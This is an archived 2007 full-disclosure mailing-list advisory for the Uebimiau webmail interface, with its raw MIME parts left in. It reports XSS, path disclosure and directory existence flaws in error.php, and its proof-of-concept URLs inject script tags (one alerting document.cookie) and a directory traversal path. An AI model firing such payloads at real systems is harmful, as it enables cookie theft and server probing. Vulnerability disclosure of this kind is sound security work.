Uebimiau Webmail Multiple Vulnerabilities
"Michal Majchrowicz" <[email protected]> Tue, 29 May 2007 00:13:15 +0200
| Newsgroups | gmane.comp.security.full-disclosure,gmane.comp.security.vulnerabilities.watch.general,gmane.comp.security.bugtraq |
|---|---|
| Message-ID | <[email protected]> |
--===============1301397624== Content-Type: multipart/alternative; boundary="----=_Part_45618_11972130.1180390395038" ------=_Part_45618_11972130.1180390395038 Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit Content-Disposition: inline Synopsis: Multiple Vulnerabilities Introduction: Uebimiau is an open source webmail interface. Details: Uebimiau doesn't correctly handle the $_GET array in error.php. Many vulnerabilities have been already discovered, but I would like to introduce few new ones: 1) XSS 2) Three Web Server Directory Path Disclosure Vulnerabilities 3) Directory Existence Vulnerability PoC: <http://www.test.com/redirect.php/%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E?subject=server&server=test> http://www.uebimiau.org/demo/pop3/error.php?selected_theme=%3Cscript%3Ealert(document.cookie)%3C/script%3E http://www.uebimiau.org/demo/pop3/error.php?smarty=test http://www.uebimiau.org/demo/pop3/error.php?selected_theme=test http://www.uebimiau.org/demo/pop3/error.php?selected_theme=: http://www.uebimiau.org/demo/pop3/error.php?selected_theme=/etc/apache2/../../var/www/web6/web/demo/pop3/themes/uebimiau/ Regards Michal Majchrowicz. Hack.pl ------=_Part_45618_11972130.1180390395038 Content-Type: text/html; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Content-Disposition: inline Synopsis: Multiple Vulnerabilities<br><br>Introduction:<br>Uebimiau is an open source webmail interface.<br><br>Details:<br>Uebimiau doesn't correctly handle the $_GET array in error.php. Many vulnerabilities have been already discovered, but I would like to introduce few new ones: <br>1) XSS <br>2) Three Web Server Directory Path Disclosure Vulnerabilities<br>3) <span class="title">Directory Existence Vulnerability</span><br><br>PoC:<br><a href="http://www.test.com/redirect.php/%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E?subject=server&server=test" target="_blank" onclick="return top.js.OpenExtLink(window,event,this)"> </a><a href="http://www.uebimiau.org/demo/pop3/error.php?selected_theme=%3Cscript%3Ealert(document.cookie)%3C/script%3E">http://www.uebimiau.org/demo/pop3/error.php?selected_theme=%3Cscript%3Ealert(document.cookie)%3C/script%3E </a><br><a href="http://www.uebimiau.org/demo/pop3/error.php?smarty=test">http://www.uebimiau.org/demo/pop3/error.php?smarty=test</a><br><a href="http://www.uebimiau.org/demo/pop3/error.php?selected_theme=test">http://www.uebimiau.org/demo/pop3/error.php?selected_theme=test </a><br><a href="http://www.uebimiau.org/demo/pop3/error.php?selected_theme=">http://www.uebimiau.org/demo/pop3/error.php?selected_theme=</a>:<br><a href="http://www.uebimiau.org/demo/pop3/error.php?selected_theme=/etc/apache2/../../var/www/web6/web/demo/pop3/themes/uebimiau/"> http://www.uebimiau.org/demo/pop3/error.php?selected_theme=/etc/apache2/../../var/www/web6/web/demo/pop3/themes/uebimiau/</a><br><br>Regards Michal Majchrowicz.<br>Hack.pl ------=_Part_45618_11972130.1180390395038-- --===============1301397624== Content-Type: text/plain; charset="us-ascii" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Content-Disposition: inline _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ --===============1301397624==--